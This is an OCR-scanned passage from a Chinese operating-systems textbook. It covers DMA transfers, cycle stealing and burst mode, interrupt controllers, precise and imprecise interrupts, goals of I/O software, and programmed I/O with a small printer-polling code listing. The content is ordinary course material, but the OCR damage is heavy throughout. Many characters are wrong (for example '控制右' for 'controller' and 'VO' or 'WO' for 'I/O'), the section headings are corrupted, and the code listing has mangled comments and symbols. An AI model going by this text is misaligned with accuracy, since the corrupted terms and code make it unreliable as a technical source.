寄存 絮 对 它 进行 编程 ， 所 以 DMA 控 制 右 知道 将 什么 数据 传送 到 什么 地 
A (图 5-4 中 的 第 1 步 ; 。DMA 控 制 器 还 要 向 磁 副 控制 器 发 出 一 个 命 
令 ， 通 知 它 从 磁盘 读数 据 到 其 内 部 的 缓冲 区 中 ， 并 且 对 校 验 和 进行 检 
验 。 如 有 位 一 控制 瑚 的 缓冲 区 中 的 数据 是 有 效 的 ， 那 么 DMA 融 可 以 开 
ATS 


DMA 控 制 器 通过 在 总 线 上 发 出 一 个 读 请 求 到 磁盘 控制 器 而 发 起 
DMA 传 送 (第 2 步 ) 。 这 一 读 请 求 看 起 来 与 任何 其 他 读 请 求 是 一 样 的 ， 
并 且 磁 副 控 制 器 并 不 知道 或 者 并 不 关心 它 是 来 自 CPU 还 是 来 自 DMA 控 
制 器 。 一 般 情况 下 ， 要 写 的 内 存 地 址 在 总 线 的 地 址 线 上 ， 所 以 当 磁 盘 
控制 器 从 其 内 部 缓冲 区 中 读 取 下 一 个 字 的 时 候 ， 它 知道 将 该 字 写 到 什 
么 地 方 。 写 到 内 存 是 另 一 个 标准 总 线 周期 〈 第 3 步 ) 。 当 写 操 作 完 成 
时 ， 磁 如 控制 器 在 总 线 上 发 出 一 个 应 答 信 号 到 DMA 控 制 器 (第 4 步 ) 2 
于 是 ，DMA 控 制 右 步 增 要 使 用 的 内 存 地 址 ， 并 且 步 减 字 市 计数 。 如 果 
字 节 计数 仍然 大 于 0， 则 重复 第 2 步 到 第 4 步 ， 直 到 字 节 计数 到 达 0。 此 
时 ，DMA 控 制 器 将 中 断 CPU 以 便 让 CPU 知 道 传送 现在 已 经 完成 了 。 当 
操作 系统 开始 工作 时 ， 用 不 着 将 磁盘 块 复制 到 内 存 中 ， 因 为 它 已 经 在 
NEFT ° 


DMA 控 制 絮 在 复 洒 性 方面 的 区 别 相当 大 。 最 简单 的 DMA 控 制 器 每 
次 处 理 一 路 传送 ， 如 上 面 所 描述 的 。 复 杂 一 些 的 DMA 控 制 器 经 过 编程 
可 以 一 次 处 理 多 路 传送 ， 这 样 的 控制 器 内 部 具有 多 组 寄存 器 ， 每 一 通 
道 一 组 寄存 器 。CPU 通 过 用 与 每 路 传送 相关 的 参数 装载 每 组 寄存 器 而 
开始 。 每 路 传送 必须 使 用 不 同 的 设备 控制 器 。 在 图 5-4 中 ， 传 送 每 一 个 
字 之 后 ，DMA 欣 制 硕 要 决定 下 一 次 要 力 哪 一 设备 提供 服务 。 DMAP I 
器 可 能 被 设置 为 使 用 轮转 算法 ， 它 也 可 能 具有 一 个 优先 级 规划 设计 ， 
以 便 让 某 些 设备 受到 比 其 他 设备 更 多 的 照顾 。 假 如 存在 一 个 明确 的 方 
法 分 辨 应 答 信号 ， 那 么 在 同一 时 间 就 可 以 挂 起 对 不 同 设备 控制 器 的 多 


个 请 求 。 出 于 这 样 的 原因 ， 经 常 将 总 线 上 不 同 的 应 答 线 用 于 每 一 个 
DMA 通 道 。 


许多 总 线 能 够 以 两 种 模式 操作 ， 每 次 一 子 模式 和 块 模式 。 菏 些 
DMA 控 制 右 也 能 够 以 这 两 种 模式 操作 。 在 前 一 个 模式 中 ， 操 作 如 上 所 
述 : DMA 欣 制 万 请 求 传送 一 个 字 并 且 得 到 这 个 字 。 如 条 CPU 也 想 使 用 
总 线 ， 它 必须 等 等 。 这 一 机 制 称 为 周期 销 取 (cycle stealing) ， 因 为 设 
备 控 制 右 偶尔 偷偷 汐 入 并 且 从 CPU 但 走 一 个 临时 的 总 线 周期 ， 从 而 轻 
微 地 延迟 CPU 。 在 块 模式 中 ，DMA 控 制 器 通知 设备 获得 总 线 ， 发 起 一 
连 串 的 传送 ， 然 后 释放 总 线 。 这 一 操作 形式 称 为 突 发 模式 (burst 
mode) 。 它 比 周期 窃取 效率 更 高 ， 因 为 获得 总 线 占用 了 时 间 ， 并 且 以 
一 次 总 线 获得 的 代价 能 够 传送 多 个 字 。 突 发 模式 的 缺点 是 ， 如 肝 正 在 
进行 的 是 长 时 间 突 发 传送 ， 有 可 能 将 CPU 和 其 他 设备 阻塞 相当 长 的 周 
期 。 


在 我 们 一 直 讨 论 的 模型 一 有 时 称 为 飞越 模式 (fly-by mode) 
中 ，DMA 控 制 右 通知 设备 控制 砷 直接 将 数据 传 运 到 主 存 。 某 些 DMA 挥 
制 絮 使 用 的 其 他 模式 古 让 设备 控制 紫 将 子 发 送 给 DMA 控 制 血 ，DMA 控 
制 喜 然 后 发 起 第 2 个 总 线 请 求 将 该 字 写 到 它 应 该 去 的 任何 地 方 。 采 用 这 
种 方案 ， 每 传送 一 个 字 需 要 一 个 额外 的 总 线 周期 ， 但 是 更 加 灵活 ， 因 
为 它 可 以 执行 设备 到 设备 的 复制 甚至 是 内 存 到 内 存 的 复制 (通过 首先 
发 起 一 个 到 内 存 的 读 ， 然 后 发 起 一 个 到 不 同 内 存 地 址 的 写 ) 。 


大 多 数 DMA 控 制 器 使 用 物理 内 存 地 址 进行 传送 。 使 用 物理 地 址 要 
求 操作 系统 将 预期 的 内 存 缓冲 区 的 虚拟 地 址 转换 为 物理 地 址 ， 并 且 将 
该 物理 地 址 写 入 DMA 控 制 器 的 地 址 寄存 器 中 。 在 少数 DMA 控 制 器 中 使 
用 的 一 个 替代 方案 是 将 虚拟 地 址 写 入 DMA 控 制 器 ， 然 后 DMA 挖 制 器 必 
须 使 用 MMU 来 完成 虚拟 地 址 到 物理 地 址 的 转换 。 只 有 在 MMU 是 内 存 
的 组 成 部 分 (有 可 能 ， 但 罕见 ) 而 不 是 CPU 的 组 成 部 分 的 情况 下 ， 才 
可 以 将 虚拟 地 址 放 到 总 线 上 。 


我 们 在 前 面 提 到 ， 在 DMA 可 以 开始 之 前 ， 磁 盘 首先 要 将 数据 读 入 
其 内 部 的 缓冲 区 中 。 你 也 许 会 产生 疑问 ， 为 什么 控制 器 从 磁盘 读 取 字 
节 后 不 立即 将 其 存储 在 主 存 中 ? 换 名 话说， 为 什么 需要 一 个 内 部 缓冲 
区 ? 有 两 个 原因 。 首 先 ， 通 过 进行 内 部 组 促 ， 磁 盘 控制 器 可 以 在 开始 
传送 之 前 检验 校 验 和 。 如 果 校 验 和 是 错误 的 ， 那 么 将 发 出 一 个 表明 错 
误 的 信号 并 且 不 会 进行 传送 。 


第 二 个 原因 十， 一 旦 亿 副 传送 开始 工作 ， 从 磁 副 读 出 的 数据 就 是 
以 固定 速率 到 达 的 ， 而 不 论 控 制 旧 是 否 准 备 好 接收 数据 。 如 来 挥 制 絮 
要 将 数据 直接 写 到 内 存 ， 则 它 必 须 为 要 传送 的 每 个 字 取 得 系统 总 线 的 
控制 权 。 此 时 ， 若 由 于 其 他 设备 使 用 总 线 而 导 人 致 总 线 忙 (例如 在 突 发 
模式 中 ) ， 则 控制 器 只 能 等 待 。 如 果 在 前 一 个 磁 强 字 还 未 被 存储 之 前 
下 一 个 磁 僵 字 到 达 ， 控 制 融 只 能 将 它 存放 在 某 个 地 方 。 如 果 总 线 非常 
忙 ， 控 制 器 可 能 需要 存储 很 多 字 ， 而 且 还 要 完成 大 量 的 管理 工作 。 如 


果 块 被 放 入 内 部 缓冲 区 ， 则 在 DMA 启 动 前 不 需要 使 用 总 线 ， 这 样 ， 控 
制 器 的 设计 就 可 以 简化 ， 因 为 对 DMA 到 内 存 的 传送 没有 严格 的 时 间 要 
Ke 事实 上 ， 有 些 老式 的 控制 器 是 直接 存 取 内 存 的 ， 其 内 部 缓冲 区 
设计 得 很 小 ， 但 是 当 总 线 很 已 时 ， 一 些 传送 有 可 能 由 于 超载 运行 错误 
而 被 终止 。) 


5.1.5 Hye PFE 


我 们 在 1.4.5 世 中 简要 介绍 了 中 断 ， 但 是 还 有 更 多 的 内 容 要 介绍 。 
在 一 台 典 型 的 个 人 计算 机 系统 中 ， 中 断 结 构 如 图 5-5 所 示 。 在 硬件 层 
面 ， 中 断 的 工作 如 下 所 述 。 当 一 个 IO 设备 完成 交 给 它 的 工作 时 ， 它 吏 
产生 一 个 中 断 (假设 操作 系统 已 经 开放 中 断 ) ， 它 是 通过 在 分 配给 它 
的 一 条 总 线 信 号 线 上 置 起 信和 号 而 产生 中 断 的 。 该 信号 被 主板 上 的 中 断 
控制 右 忌 片 检测 到 ， 由 中 断 控制 如 心 厂 决定 做 什么 。 
1. 设备 完成 工作 


CPU 3. CPU 响 应 ” 中断 控 制 器 / 
cP 


2, 中 断 控制 器 BP wp 
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用 的 是 总 线 上 的 中 断 线 而 不 是 专用 连 线 


如 有 果 没 有 其 他 中 断 巧 而 未 决 ， 中 断 控 制 器 将 立刻 对 中 断 进 行 处 
理 。 如 果 有 另 一 个 中 断 正在 处 理 中 ， 或 者 另 一 个 设备 在 总 线 上 具有 更 


高 优先 级 的 一 条 中 上 断 请 求 线 上 同时 发 出 中 断 请 求 ， 该 设备 将 暂时 不 被 
理 皮 。 在 这 种 情况 下 ， 该 设备 将 继续 在 总 线 上 置 起 中 断 信号 ， 直 到 得 
到 CPU 的 服务 。 


为 了 处 理 中 断 ， 中 断 控制 器 在 地 址 线 上 放置 一 个 数字 表明 哪个 设 
备 需 要 关注 ， 并 且 置 起 一 个 中 断 CPU 的 信和 号。 


中 断 信 号 导致 CPU 停止 当前 正在 做 的 工作 并 且 开 始 做 其 他 的 事 
情 。 地 址 线 上 的 数字 被 用 做 指向 一 个 称 为 中 断 向 量 (interrupt vector) 
的 表格 的 索引 ， 以 便 读 取 一 个 新 的 程序 计数 器。 这 一 程序 计数 器 指向 
相应 的 中 断 服 务 过 程 的 开始 。 一 般 情 况 下 ， 陷 阱 和 中 断 从 这 一 点 上 看 
使 用 相同 的 机 制 ， 并 且 常 党 共 至 相同 的 中 断 向 量 。 中 断 向 量 的 位 置 可 
以 便 布 线 到 机 套 中 ， 也 可 以 在 内 存 中 的 任何 地 方 通过 一 个 CPU 寄存 郁 
(由 操作 系统 装载 ) 指向 其 起 点 。 


中 断 服 务 过 程 开 始 运行 后 ， 它 立刻 通过 将 一 个 确定 的 值 写 到 中 断 
控制 夯 的 茶 个 IO 病 口 来 对 中 断 做 出 应 答 。 这 一 应 答 告 诉 中 断 控 制 亏 可 
以 自由 地 发 出 另 一 个 中 断 。 通 过 让 CPU 延迟 这 一 应 答 直 到 它 准 备 好 处 
理 下 一 个 中 断 ， 束 可 以 避免 与 多 个 几乎 同时 发 生 的 中 断 相 牵涉 的 葛 争 
状态 。 说 句 题 外 的 话 ， 某 些 (老式 的 ) 计算 机 没有 集中 的 中 断 控制 
硬 ， 所 以 每 个 设备 控制 占 请 求 目 己 的 中 断 。 


在 开始 服务 程序 之 前 ， 便 件 总 是 要 保存 一 定 的 信息 。 哪 些 信息 要 
保存 以 及 将 其 保存 到 什么 地 方 ， 不 同 的 CPU 之 间 存 在 巨大 的 老 别 。 作 
为 最 低 限 度 ， 必 须 保存 程序 计数 郁 ， 这 样 被 中 断 的 进程 才能 够 重新 开 
始 。 在 夯 一 个 极端 ， 所 有 可 见 的 寄存 器 和 很 多 内 部 寄存 器 或 许 也 要 保 
存 。 


将 这 些 信息 保存 到 什么 地 方 是 一 个 问题 。 一 种 选择 是 将 其 放 入 内 
部 寄存 器 中 ， 在 需要 时 操作 系统 可 以 读 出 这 些 内 部 寄存 髓 。 这 一 方法 
的 问题 是 ， 中 断 挥 制 絮 之 后 无 法 得 到 应 答 ， 直 到 所 有 可 能 的 相关 信息 
被 读 出 ， 以 免 第 二 个 中 断 重 写 内 部 寄存 器 保存 状态 。 这 一 策略 在 中 断 
被 蔡 止 时 将 导致 长 时 间 的 死机 ， 并 且 可 能 丢失 中 断 和 丢失 数据 。 


办 此 ， 大 多 数 CPU 在 堆栈 中 保存 信息 。 然 而 ， 这 种 方法 也 有 问 
题 。 首 先 ， 使 用 谁 的 堆栈 ? 如 有 果 使 用 当前 堆栈 ， 则 它 很 可 能 是 用 户 进 
程 的 堆栈 。 扒 栈 指针 甚至 可 能 不 是 合法 的 ， 这 样 当 硬件 试 独 在 它 所 指 
的 地 址 处 写 某 些 字 时 ， 将 导致 怪 命 错误 。 此 外 ， 它 可 能 指向 一 个 页 面 
的 末端 。 大 干 次 内 存 写 之 后 ， 页 面 边界 可 能 被 超出 并 且 产 生 一 个 页 面 
故障 。 在 硬件 中 断 处 理 期 间 如 果 发 生 页 面 故障 将 引起 更 大 的 问题 ， 在 
何 处 保存 状态 以 处 理 页 面 故障 ? 


如 采 使 用 内 核 堆 栈 ， 将 存在 更 多 的 堆栈 指针 是 合法 的 并 且 指 同一 
个 固定 的 页 面 的 机 会 。 然 而 ， 切 换 到 核心 仿 可 能 要 求 改变 MMU 上 下 
文 ， 并 且 可 能 使 高 速 缓存 和 TLB 的 大 部 分 或 全 部 失效 。 静态 地 或 动态 


地 重新 装载 所 有 这 些 东 西 将 增加 处 理 一 个 中 断 的 时 间 ， 因 而 浪费 CPU 
的 时 间 。 


精确 中 断 和 不 精确 中 断 


另 一 个 问题 是 由 下 面 这 样 的 事实 引起 的 : 现代 CPU 大 量 地 采用 流 
水 线 并 且 有 了 时 还 采用 超标 量 〈 内 部 并 行 ) 。 在 老式 的 系统 中 ， 每 条 指 
令 完 成 执行 之 后 ， 微 程序 或 硬件 将 检查 是 否 存 在 蔓 而 未 决 的 中 断 。 如 
果 存 在 ， 那 么 程序 计数 器 和 PSW 将 被 压 入 堆栈 中 而 中 断 序列 将 开始 。 
在 中 断 处 理 程 序 运 行 之 后 ， 相 反 的 过 程 将 会 发 生 ， 旧 的 PSW 和 程序 计 
数 右 将 从 堆栈 中 弹出 并 且 移 前 的 进程 继续 运行 。 


这 一 模型 使 用 了 隐 含 的 假设 ， 这 束 是 如 果 一 个 中 断 正 好 在 菏 一 指 
令 之 后 发 生 ， 那 么 这 条 指令 前 的 所 有 指令 (包括 这 条 指令 ) 都 完整 地 
执行 过 了 ， 而 这 条 指令 后 的 指令 一 条 也 没有 执行 。 在 老式 的 机 和 郁 上 ， 
这 一 假设 总 是 正确 的 ， 而 在 现代 计算 机 上 ， 这 一 假设 则 未 必 是 正确 
的 。 


首先 ， 考 虑 图 1-6a 的 流水 线 模型 。 在 流水 线 满 的 时 候 (通常 的 情 
形 ) ， 如 有 果 出 现 一 个 中 断 ， 那 么 会 发 生 什 么 情况 ? 许多 指令 正 处 于 各 
种 不 同 的 执行 阶段 ， 当 中 断 出 现时 ， 程 序 计 数 器 的 值 可 能 无 法 正确 地 
反映 已 经 执行 过 的 指令 和 尚未 执行 的 指令 之 间 的 边界 。 事 实 上 ， 许 多 
日 令 可 能 部 分 地 执行 了 ， 不 同 的 指令 完成 的 程度 或 多 或 少 。 在 这 种 情 


况 下 ， 程 序 计数 器 更 有 可 能 反映 的 是 将 要 被 取出 并 压 入 流水 线 的 下 一 
条 指令 的 地 址 ， 而 不 是 刚刚 被 执行 单元 处 理 过 的 指令 的 地 址 。 


在 如 图 1-7b 所 示 的 超标 量 计算 机 上 ， 事 情 更 加 精 料 。 指 令 可 能 分 解 
成 微 操作 ， 而 微 操作 有 可 能 乱 序 执行 ， 这 取决 于 内 部 资源 (如 功能 
元 和 寄存 器 ) 的 可 用 性 。 当 中 断 发 生 时 ， 某 些 很 久 以 前 启动 的 指令 可 
能 还 没 开始 执行 ， 而 其 他 最 近 局 动 的 指令 可 能 几乎 要 完成 了 。 当 中 断 
言 号 出 现时 ， 可 能 存在 许多 指令 处 于 不 同 的 完成 状态 ， 它 们 与 程序 计 
数 硬 之 间 没 有 什么 关系 。 


将 机 器 留 在 一 个 明确 状态 的 中 断 称 为 精确 中 断 (precise interrupt) 
(WalkerflCragon, 1995) ° 精确 中 断 具 有 4 个 特性 : 


1)PC (程序 计数 器 ) 保存 在 一 个 已 知 的 地 方 。 
2)PC 所 指向 的 指令 之 前 的 所 有 指令 已 经 完全 执行 。 


3)PC 所 指向 的 指令 之 后 的 所 有 指令 都 没有 执行 。 


4)PC 所 指向 的 指令 的 执行 状态 是 已 知 的 。 


注意 ， 对 于 PC 所 指向 的 指令 之 后 的 那些 指令 来 说 ， 此 处 并 没有 森 
止 它们 开始 执行 ， 而 只 是 要 求 在 中 断 发 生 之 前 必须 撤销 它们 对 寄存 天 
或 内 存 所 做 的 任何 修改 。PC 所 指向 的 指令 有 可 能 已 经 执行 了 ， 也 有 可 
能 还 没有 执行 ， 然 而 ， 必 须 清 楚 适 用 的 是 哪 种 情况 。 通 常 ， 如 果 中 断 


古 一 个 VO 中 断 ， 那 么 指令 束 会 还 没有 开始 执行 。 然 而 ， 如 有 果 中 断 实 际 
上 是 一 个 陷阱 或 者 页 面 故 障 ， 那 么 PC 一 般 指向 导致 错误 的 指令 ， 所 以 
它 以 后 可 以 重 狐 开始 执行 。 图 5-6a 所 示 的 情形 描述 了 精确 中 断 。 程 序 计 
数 器 (316) 之 前 的 所 有 指令 都 已 经 完成 了 ， 而 它 之 后 的 指令 都 还 没有 
启动 (或 者 已 经 回 退 以 撤销 它们 的 作用 ) 。 
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不 满足 这 些 要 求 的 中 断 称 为 不 精确 中 断 (imprecise interrupt) ， 不 
精确 中 断 使 操作 系统 编写 者 过 得 极为 不 愉快 ， 现 在 操作 系统 编写 者 必 
须 断 定 已 经 发 生 了 什么 以 及 还 要 发 生 什么 。 图 5-6b 描 述 了 不 精确 中 断 ， 
其 中 邻近 程序 计数 器 的 不 同 指 令 处 于 不 同 的 完成 状态 ， 老 的 指令 不 一 
定 比 新 的 指令 完成 得 更 多 。 具 有 不 精确 中 断 的 机 器 通常 将 大 量 的 内 部 
状态 “吐出 ”到 堆栈 中 ， 从 而 使 操作 系统 有 可 能 判断 出 正在 发 生 什么 事 
情 。 重 新 启动 机 器 所 必需 的 代码 通 肖 极其 复杂 。 此 外 ， 在 每 次 中 断 发 
生 时 将 大 量 的 信息 保存 在 内 存 中 使 得 中 断 啊 应 十 分 缓慢 ， 而 恢复 则 更 


加 糟糕 。 这 就 导致 具有 讽刺 意味 的 情形 : 由 于 缓慢 的 中 断 使 得 非常 快 
速 的 超标 量 CPU 有 时 并 不 适合 实时 工作 。 


有 些 计 算 机 设计 成 某 些 种 类 的 中 断 和 陷阱 生 狂 确 的 ， 而 其 他 的 不 
征 。 例 如 ， 可 以 让 IO 中 断 是 精确 的 ， 而 归 因 于 致命 编程 错误 的 陷阱 是 
不 精确 的 ， 由 于 在 被 0 除 之 后 不 需要 尝试 重新 开始 运行 的 进程 ， 所 以 这 
样 做 也 不 错 。 有 些 计 算 机 具有 一 个 位 ， 可 以 设置 它 强迫 所 有 的 中 断 都 
苹 精 确 的 。 设 置 这 一 位 的 不 利之 处 是 ， 它 强迫 CPU 仔 细 地 将 正在 做 的 
一 切 事情 记 入 日 志 并 且 维 护 寄存 器 的 影子 副本 ， 这 样 才能 够 在 任意 时 
刻 生 成 精确 中 断 。 所 有 这 些 开销 都 对 性 能 具有 较 大 的 影响 。 


某 些 超 标量 计算 机 (例如 Pentium 系 列 ) 具有 精确 中 断 ， 从 而 使 老 
的 软件 正确 工作 。 为 精确 中 断 付 出 的 代价 是 CPU 内 部 极其 复杂 的 中 断 
逻辑 ， 以 便 确 保 当 中 断 控 制 右 发 出 信号 想 要 导致 一 个 中 断 时 ， 人 允许 直 
到 某 一 点 之 前 的 所 有 指令 完成 而 不 允许 这 一 点 之 后 的 指令 对 机 絮 状 态 
产生 任何 重要 的 影响 。 此 处 付出 的 代价 不 古 在 时 间 上 ， 而 是 在 心 片 面 
积 和 设计 复杂 性 上 。 如 采 不 是 因为 向 后 兼容 的 目的 而 要 求 精确 中 断 的 
话 ， 这 一 必 片 面积 就 可 以 用 于 更 大 的 片上 高 速 缓存 ， 从 而 使 CPU 的 速 
度 更 快 。 另 一 方面 ， 不 精确 中 断 使 得 操作 系统 更 为 复杂 而 且 运 行 得 更 
加 缓慢， 所 以 断定 哪 一 种 方法 更 好 是 十 分 困难 的 。 


5.2 ”IO 软件 原理 


在 讨论 了 IO 硬件 之 后 ， 下 面 我 们 来 看 一 看 MO 软件 。 首 和 我 们 将 
看 一 看 MO 软件 的 目标 ， 然 后 从 操作 系统 的 观点 来 看 一 看 MO 实现 的 不 
同方 法 。 


5.2.1 VO 软件 的 目标 


在 设计 WO 软件 时 一 个 关键 的 概念 是 设备 独立 性 (device 
independence) 。 它 的 意思 是 应 该 能 够 编写 出 这 样 的 程序 ， 它 可 以 访问 
任意 IO 设备 而 无 需 事 先 指定 设备 。 例 如 ， 读 取 一 个 文件 作为 输入 的 程 
序 应 该 能 够 在 硬盘 、CD-ROM、DVD 或 者 USB 副 上 读 取 文件 ， 无 需 为 
每 一 种 不 同 的 设备 修改 程序 。 类 似 地 ， 用 户 应 该 能 够 键入 这 样 一 条 命 
4 


sort <input > output 


并 且 无 论 输 入 来 目 任 意 类 型 的 存储 盘 或 者 键盘 ， 和 输出 送 往 任 意 类 
型 的 存储 盘 或 者 屏 医 ， 上 述 命令 都 可 以 工作 。 尽 管 这 些 设备 实际 上 卷 
别 很 天， 需要 非常 不 同 的 命令 序列 来 读 或 写 ， 但 这 一 事实 所 带 来 的 问 
题 将 由 操作 系统 负责 处 理 。 


与 设备 独立 性 密切 相关 的 是 统一 命名 (uniform naming) 这 一 目 
标 。 一 个 文件 或 一 个 设备 的 名 字 应 该 是 一 个 简单 的 字符 串 或 一 个 整 
数 ， 它 不 应 依赖 于 设备 。 在 UNIX 系 统 中 ， 所 有 存储 盘 都 能 以 任意 方式 
集成 到 文件 系统 层次 结构 中 ， 因 此 ， 用 户 不 必 知 道 哪个 名 字 对 应 于 哪 
台 设 备 。 例 如 ， 一 个 USB 盘 可 以 安装 (mount) 到 目录 /usr/ast/backup 
下 ， 这 样 复制 一 个 文件 到 /usr/ast/backup/monday 就 是 将 文件 复制 到 USB 
盘 上 。 用 这 种 方法 ， 所 有 文件 和 设备 都 采用 相同 的 方式 一 一 路 径 名 进 


TES 


IO 软件 的 另 一 个 重要 问题 是 错误 处 理 (error handling) 。 一 般 来 
说 ， 错 误 应 该 尽 可 能 地 在 接近 硬件 的 层面 得 到 处 理 。 当 控制 寓 发 现 了 
一 个 读 错 座 时 ， 如 有 果 它 能 够 处 理 那 么 就 应 该 目 己 设法 纠正 这 一 错误 。 
如 果 控 制 絮 处 理 不 了 ， 那 么 设备 驱动 程序 应 当 予 以 处 理 ， 可 能 只 需 重 
读 一 次 这 块 数据 就 正确 了 。 很 多 错误 是 偶然 性 的 ， 例 如 ， 磁 盘 读 写 头 
上 的 灰尘 导致 读 写 错误 时 ， 重 复 该 操作 ， 错 误 经 冲 台 会 消失 。 只 有 在 
低层 软件 处 理 不 了 的 情况 下 ， 才 将 错误 上 区 高 层 处 理 。 在 许多 情况 
下 ， 错 误 恢 复 可 以 在 低层 透明 地 得 到 解决 ， 而 高 层 软件 甚至 不 知道 存 


在 这 一 错误 。 


另 一 个 关键 问题 是 同步 (synchronous) 《 即 阻塞 ) 和 异步 
(asynchronous) ”( 即 中 断 驱 动 ) 传输 。 大 多 数 物理 IO 是 异步 的 一 一 
CPU 启动 传输 后 便 转 去 做 其 他 工作 ， 直 到 中 断 发 生 。 如 果 IO 操 作 是 阻 
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将 目 动 被 挂 起 ， 直 到 缓冲 区 中 的 数据 准备 好 。 正 是 操作 系统 使 实际 上 
苹 中 断 驱 动 的 操作 变 为 在 用 户 程序 看 来 是 阻塞 式 的 操作 。 


LO 软件 的 另 一 个 问题 是 缓冲 (buffering) 。 数 据 离开 一 个 设备 之 
后 通常 并 不 能 直接 存放 到 其 最 终 的 目的 地 。 例 如 ， 从 网 络 上 进来 一 个 
数据 包 时 ， 直 到 将 该 数据 包 存放 在 某 个 地 方 并 对 其 进行 检查 ， 操 作 系 
统 才 知 道 要 将 其 置 于 何 处 。 此 外 ， 某 些 设备 具有 严格 的 实时 约束 〈 例 
如 ， 数 字音 频 设 备 ) ， 所 以 数据 必须 预先 放置 到 输出 缓冲 区 之 中 ， 从 
而 请 除 缓冲 区 填 满 速率 和 缓冲 区 清空 速率 之 间 的 相互 影响 ， 以 避免 缓 
冲 区 父 载 。 缓 冲 涉及 大 量 的 复制 工作 ， 并 且 经 常 对 MO 性 能 有 重大 影 
Aja] © 


此 处 我 们 将 提 到 的 最 后 一 个 概念 是 共 至 设备 和 独占 设备 的 问题 。 
AFRE 〈 如 磁盘 ) 能 够 同时 让 多 个 用 户 使 用 。 多 个 用 户 同时 在 同 
一 磁盘 上 打开 文件 不 会 引起 什么 问题 。 其 他 设备 《如 磁带 机 ) 则 必须 
由 单个 用 户 独 占 使 用 ， 直 到 该 用 户 使 用 完 ， 男 一 个 用 户 才 能 拥有 该 磁 
市 机 。 让 两 个 或 更 多 的 用 户 随机 地 将 交叉 混杂 的 数据 块 写 入 相同 的 做 
带 是 注定 不 能 工作 的 。 独 占 〈 非 共享 ) 设备 的 引入 也 带 来 了 各 种 各 样 
的 问题 ， 如 死 锁 。 同 样 ， 操 作 系 统 必须 能 够 处 理 共 至 设备 和 独占 设备 
以 避免 问题 发 生 。 


5.2.2 ”程序 控制 IO 


IO 可 以 以 三 种 根本 不 同 的 方式 实现 。 在 本 小 节 中 我 们 将 介绍 第 一 
种 (程序 控制 WO) ， 在 后 面 两 小 节 中 我 们 将 研究 另外 两 种 (中断 驱 动 
WO 和 使 用 DMA 的 WO) 。IO 的 最 简单 形式 是 让 CPU 做 全 部 工作 ， 这 一 
方法 称 为 程序 控制 WO (programmed I/O) ° 


借助 于 例子 来 说 明 程序 控制 /O 是 最 简单 的 。 考 虑 一 个 用 户 进程 ， 
该 进程 想 在 打印 机 上 打印 8 个 字符 的 字符 串 “ABCDEFGH”。 它 首先 要 在 
用 户 空间 的 一 个 缓冲 区 中 组 装 字符 串 ， 如 图 5-7a 所 示 。 


然后 ， 用 户 进程 通过 发 出 系统 调用 打开 打印 机 来 获得 打印 机 以 便 
进行 写 操 作 。 如 采 打 印 机 当前 被 另 一 个 进程 占用 ， 该 系统 调用 将 失败 
并 返回 一 个 错误 代码 ， 或 者 将 阻塞 直到 打印 机 可 用 ， 具 体 情况 取决 于 
操作 系统 和 调用 参数 。 一 旦 拥有 打印 机 ， 用 户 进 程 吏 发 出 一 个 系统 调 
用 通知 操作 系统 在 打印 机 上 打印 字符 串 。 


然后 ， 操 作 系 统 〈 通 常 ) 将 字符 串 缓 冲 区 复制 到 内 核 空 间 中 的 一 
个 数组 (如 p) 中 ， 在 这 里 访问 更 加 容易 (因为 内 核 可 能 必须 修改 内 存 
映射 才能 到 达 用 户 空间 ) 。 然 后 操作 系统 要 查看 打印 机 当前 是 否 可 
用 。 如 琳 不 可 用 ， 束 要 等 得 直到 它 可 用 。 一 旦 打印 机 可 用 ， 操 作 系 统 
忠 复 制 第 一 个 字符 到 打印 机 的 数据 寄存 器 中 ， 在 这 个 例子 中 使 用 了 内 


存 映 射 7O0。 这 一 操作 将 激活 打印 机 。 字 符 也 许 还 不 会 出 现在 打印 机 
上 ， 因 为 某 些 打印 机 在 打印 任何 东西 之 前 要 先 缓冲 一 行 或 一 页 。 然 
而 ， 在 图 5-7b 中 ， 我 们 看 到 第 一 个 字符 已 经 打印 出 来 ， 并 且 系统 已 经 
将 <B” 标 记 为 下 一 个 待 打印 的 字符 。 


待 打 印 的 
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一 旦 将 第 一 个 字符 复制 到 打印 机 ， 操 作 系 统 束 要 查看 打印 机 是 否 
号 绪 准 备 接收 男 一 个 字符 。 一 般 而 言 ， 打 印 机 都 有 第 二 个 寄存 右 ， 用 
于 表明 其 状态 。 将 字符 写 到 数据 寄存 右 的 操作 将 导致 状态 变 为 非 束 
绪 。 当 打印 机 控制 各 处 理 完 当 前 字符 时 ， 它 束 通 过 在 其 状态 寄存 郁 中 
设置 菏 一 位 或 者 将 某 个 值 放 到 状态 寄存 事 中 来 表示 其 可 用 性 。 


这 时 ， 操 作 系 统 将 等 行 打印 机 状态 再 次 变 为 束 绪 。 打 印 机 整 绪 事 
件 发 生 时 ， 操 作 系统 器 打印 下 一 个 字符 ， 如 岁 5-7c 所 示 。 这 一 循环 继续 
进行 ， 直 到 整个 字符 串 打印 完 。 然 后 ， 欣 制 返回 到 用 户 进程 。 


操作 系统 相继 采取 的 操作 总 结 在 图 5-8 中 。 首 先 ， 数 据 被 复制 到 内 


核 空间 。 然 后 ， 操 作 系 统 进入 一 个 密闭 的 循环， 一 次 输出 一 个 子 符 。 
在 该 图 中 ， 清 楚 地 说 明了 程序 控制 VO 的 最 根本 的 方面 ， 这 就 是 输出 一 


该 
个 字符 之 后 ，CPU 要 不 断 地 查询 设备 以 了 解 它 是 否 就 绪 准 备 接收 另 一 
字 


| 
个 字符 。 这 一 行为 经 常 称 为 轮 询 (polling) 或 忙 等 待 (busy 


waiting) 。 


copy_from_user(buffer, p, count); je pat 内 核 缓冲 区 */ 
for (i = 0; i < count; i++) { /# 对 每 个 字符 循环 */ 
while (*printer_status_reg != READY); /* Ji AP wey */ 


*printer_data_register = p[i]; /* 输出 一 个 字符 */ 


return_to_user‘( ); 


图 5-8 使 用 程序 控制 WO 将 一 个 字符 串 写 到 打印 机 


程序 控制 VO 十 分 简单 但 是 有 缺点 ， 即 直到 全 部 WO 完成 之 前 要 占用 
CPU 的 全 部 时 间 。 如 果 “ 打 印 ” 一 个 字符 的 时 间 非 常 短 (因为 打印 机 所 做 
的 全 部 事情 就 是 将 新 的 字符 复制 到 一 个 内 部 缓冲 区 中 ) ， 那 么 忙 等 竺 
还 古 不 错 的 。 此 外 ， 在 租 入 式 系统 中 ，CPU 没 有 其 他 事情 要 做 ， 忙 等 
行 也 是 合理 的 。 然 而 ， 在 更 加 复杂 的 系统 中 ，CPU 有 其 他 工作 要 做 ， 
忙 等 待 将 是 低 效 的 ， 需 要 更 好 的 MO 方法 。 


5.2.3 PaTsksyl/o 
